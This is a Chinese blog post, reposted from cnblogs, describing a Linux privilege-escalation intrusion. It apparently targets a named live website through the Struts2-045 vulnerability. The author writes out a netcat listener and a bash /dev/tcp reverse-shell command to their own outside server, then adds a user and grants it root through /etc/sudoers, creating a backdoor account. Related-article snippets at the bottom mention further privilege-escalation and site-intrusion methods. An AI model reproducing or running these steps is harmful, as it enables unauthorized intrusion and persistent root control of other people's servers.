记一次初步Linux提权

最新推荐文章于 2024-09-14 23:11:55 发布
最新推荐文章于 2024-09-14 23:11:55 发布
阅读量61 收藏
点赞数
文章标签: 操作系统 java 网络
原文链接:http://www.cnblogs.com/wh4am1/p/6580153.html
版权

 前言、

提权这么久了  还是头一次提下Linux的服务器。。。

由于之前一直钻研的win服务器  要不是前些日子爆出来Struts2-045漏洞

估计还没时间接触Linux提权....

 

正文、

st2漏洞页面

http://www.dainar.com/index.action

  

可以看到是root权限的

接着就是想办法添加一个root组的用户

由于添加用户需要两次重复输入密码(不像win服务器直接net user)

所以nc反弹一个shell到外网服务器上

nc -vv -l -p 2333

  在st2工具里输入

bash -i >& /dev/tcp/10.0.0.1/2333 0>&1

  10.0.0.1是你的外网ip  2333是你监听的端口

然后执行反弹 成功反弹上来后

添加用户、

用adduser命令添加一个普通用户,命令如下:
#adduser sf197  //添加一个名为sf197的用户
#passwd sf197   //修改密码
Changing password for user sf197.
New UNIX password:     //在这里输入新密码
Retype new UNIX password:  //再次输入新密码
passwd: all authentication tokens updated successfully.//建立成功。

  

添加用户到root组、

方法一:修改 /etc/sudoers 文件,找到下面一行,把前面的注释(#)去掉
## Allows people in group wheel to run all commands
%wheel    ALL=(ALL)    ALL
然后修改用户,使其属于root组(wheel),命令如下:
#usermod -g root sf197
修改完毕,现在可以用sf197帐号登录,然后用命令 su - ,即可获得root权限进行操作。


方法二:修改 /etc/sudoers 文件,找到下面一行,在root下面添加一行,如下所示:
## Allow root to run any commands anywhere
root    ALL=(ALL)     ALL
sf197   ALL=(ALL)     ALL
修改完毕,现在可以用sf197帐号登录,然后用命令 su - ,即可获得root权限进行操作。

成功添加完毕

用ssh协议连接服务器  执行id返回root组!

 

转载请注明本文作者:admin-神风

本文来源:http://www.cnblogs.com/wh4am1/p/6580153.html

转载于:https://www.cnblogs.com/wh4am1/p/6580153.html

weixin_30906701
关注
一次针对linux提权
tanw923的博客
08-08 412
一次linux提权的方法1.实验环境下查看内核版本,该版本存在本地提权漏洞2.whoami查看为tanw用户3.使用vim编写以下开源代码的c程序4.编译该c程序5.运行该编译的c程序,显示#,已经提权成功6.查看当前的状态 内核版本需3.13.0-3.19,如Ubuntu 12.04/14.04/14.10/15.04 1.实验环境下查看内核版本,该版本存在本地提权漏洞 2.whoami查...
一次Linux安全提权总结
kali_Ma的博客
09-15 613
前言:人们赞美流星,是因为它燃烧着走完自己的全部路程。 一、初识SUID 1.suid的简介 suid即set user id,是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。需要这种特殊权限的场景在Linux下很常见。 已知的可以用来提权Linux可执行文件有: CopyNmap、Vim、find、Bash、More、Less、Nano、cp 比如常用的ping命令。ping需要发送ICMP报文,而这个操作需要发送Raw Socket。在Linux 2.2引入CAPABILITI
Linux提权全剧终
Ms08067安全实验室
03-11 1176
喜欢就关注我吧,订阅更多最新安全知识文章来源|MS08067 内网安全知识星球本文作者:非正常接触(Ms08067内网安全小组成员)内网纵横四海 认准Ms08067这里介绍一些Linux...
lunix入侵别人电脑_一次Linux的实战入侵过程
weixin_34207964的博客
12-24 1348
注:本人是个菜鸟。一、利用文件上传漏洞获取webshell。确定要攻击的目标网站。图上的目标站域名过期了,只能通过ip地址访问。大概在去年的时候,对目标站实施了入侵,具体如下:本想着通过sql注入的方式方式爆出用户密码,通过sqlmap扫描注入发现没有注入点,但但得到了数据库是mysql。后来想着干脆自己去目标站注册一个账户。当然用户信息肯定是随便填的。登录成功之后发现我登录的用户有头像上传功能。...
一文吃透Linux提权
brother499的博客
10-25 1553
0x001 linux提权描述 大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件。特权升级意味着用户获得他们无权获得的特权。这些特权可用于删除文件,查看私人信息或安装不需要的程序,例如病毒。通常,当系统存在允许绕过安全性的错误或对使用方法的设计假设存在缺陷时,通常会发生这种情况。 特权提升是利用操作系统或软件应用程序中的错误,设计缺陷等等来获得对通常受到应用程序或用户保护的资源的更高访问权限的行为。结果是,具有比应用程序开发人员或系统管理员
Linux提权基础
2301_77004573的博客
11-08 209
( backup.sh 脚本有定义完整的路径),cron 将引用 /etc/crontab 文件中的 PATH 变量下列出的路径;在这种情况下,我们可以尝试在用户的主文件夹(home)下创建一个名为“antivirus.sh”的脚本,然后让它作为 cron 任务运行。最终传入的反向 shell 连接能够帮助我们成功获取 root 权限。一旦你发现现有的脚本或任务被附加到cron jobs,那么就值得花时间去了解相关脚本的功能以及如何在上下文中使用工具对cron jobs进行利用。
一次酣畅淋漓的UDF提权Linux
Jay17的博客
07-08 1367
一次酣畅淋漓的UDF提权Linux
Metasploit上使用RPC方式复现一个Linux提权漏洞
weixin_42324313的博客
08-12 2018
Metasploit上使用RPC方式复现一个Linux提权漏洞 刚刚拿到任务时,我的理解是利用Metasploit工具对Linux系统进行渗透并提权 发现没有涉及到RPC方式,对RPC只知道是远程过程调用,不知道具体用法。难道是 利用RPC远程调用Linux上的Metasploit进行渗透提权,好像也说不通。 请教了一下学长,在学长的解释下有了大致的理解,Metasploit上有个msfd命...
一次靶机渗透实战
crispr的博客
04-30 808
一次vulnhub靶机渗透实战 本文转自爱春秋 https://bbs.ichunqiu.com/thread-56993-1-1.html 靶机IP为静态IP:192.168.0.150 0x00 知识总结 1.nmap进行初步信息的收集 2.任意文件读取的利用以及phpLiteAdmin远程php代码执行漏洞 3.敏感信息隐写和ssh私钥连接 4.chkrootkit漏洞进行本地...
Linux操作系统基础教程
04-08
在这一讲中,我们主要是了解一下 Linux 的概况,以及对 Linux 有一个初步的感性认识。 一.什么是LinuxLinux 是一个以 Intel 系列 CPU(CYRIX,AMD 的 CPU也可以)为硬件平台,完全免费的 UNIX 兼容系统,完全...
初识linux之进程
Masquerena114514的博客
11-23 680
讲解了了解linux中的进程所需的冯诺依曼机构及操作系统的基础知识。同时还有进程的概念、进程查看、进程状态、进程优先级、进程切换、环境变量和进程地址空间等内容
1. Linux系统简介
qq_27009517的博客
07-28 9625
好的开始是成功的一半。学习 Linux 的第一个问题是搞明白 Linux 是什么,了解其来龙去脉、前世今生,知道其发展趋势、应用前景,弄清楚为什么学习它,以及如何掌握它和使用它,知其然更要知其所以然。 本章致力于让读者对 Linux 有一个宏观的认识,总览其整体,后续章节再依次讲解 Linux 的每一部分的知识点。 工欲善其事,必先利其器。建议学习 Linux 的朋友不要忽视本章章。很多人看技术类图书都不喜欢或不重视第一章,甚至直接跳过去,觉得大多是介绍性的内容,陈词滥调、形式化,且没什么 技术含量。 建议
网络安全从入门到精通(特别篇I):Linux安全事件应急响应之Linux应急响应基础必备技能
HACKONE的博客
04-10 156
awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
4.网络编程
weixin_45476535的博客
09-14 343
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
Linux入门——“Linux基本指令”上
最新发布
2301_79972085的博客
09-14 708
在刚开始学习Linux时,首先需要掌握一些基本指令,以便我们能更好地使用Linux操作系统,以下指令在Ubuntu 22上执行。以下内容不过多介绍选项内容。
OpenHarmony(鸿蒙南向开发)——轻量系统芯片移植案例(一)
鸿蒙开发知识记录
09-14 1608
huks部件适配时,huks_key_store_path配置选项用于指定存放秘钥路径,ohos_security_huks_mbedtls_porting_path配置选项用于指定进行mbedtls适配的目录,用于芯片对mbedtls进行硬件随机数等适配。graphic配置文件见 //vendor/bestechnic/display_demo/graphic_config/product_graphic_lite_config.h。在本次适配过程中,将其调整为0x1000。
DOS脚本分析
YJlio的博客
09-11 310
S-1-5-19是本地服务帐户的安全标识符(SID),通常用于判断是否有足够的权限。:该行命令生成一个VBScript文件,通过Shell对象以管理员权限重新运行当前批处理文件(%~f0表示当前脚本的完整路径,runas表示以管理员权限运行)。else:如果ping失败(即网络连接中断状态),则显示提示信息并进入pause,等待用户按键,然后重新检查网络连接。ping *** >nul:通过ping命令检测指定服务器(***)是否有效。||: 表示如果前面的命令失败,则执行后面的部分。
大模型推理--PagedAttention
姚光超的专栏
09-11 939
在上一篇博客《》中详细介绍了大模型推理的decoding阶段可以采用KV Cache来优化重复计算的原理。虽然KV Cache大幅提升了大模型token生成的速度,但是也引入了新的问题,主要有两个:1. KV Cache在长上下文的情况下占用量非常大,导致batch很小,进而影响吞吐量,甚至根本无法支持长上下文;2. 大模型推理的时候无法预知会产生多少token,所以无法给KV Cache预分配空间,现在的通用做法是按照生成token的上限来分配空间,这产生了非常大的空间浪费。
Linux内核PRCTL提权漏洞利用:从Webshell到ROOT权限
在描述中提到的"Linux下WEBSHELL提权一技"是指利用Webshell,尤其是phpshell2.0,来提升权限至ROOT。这种方法通常针对那些存在安全漏洞的Linux主机,尤其是那些仍保留旧版内核的系统。 这里涉及的关键知识点包括: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值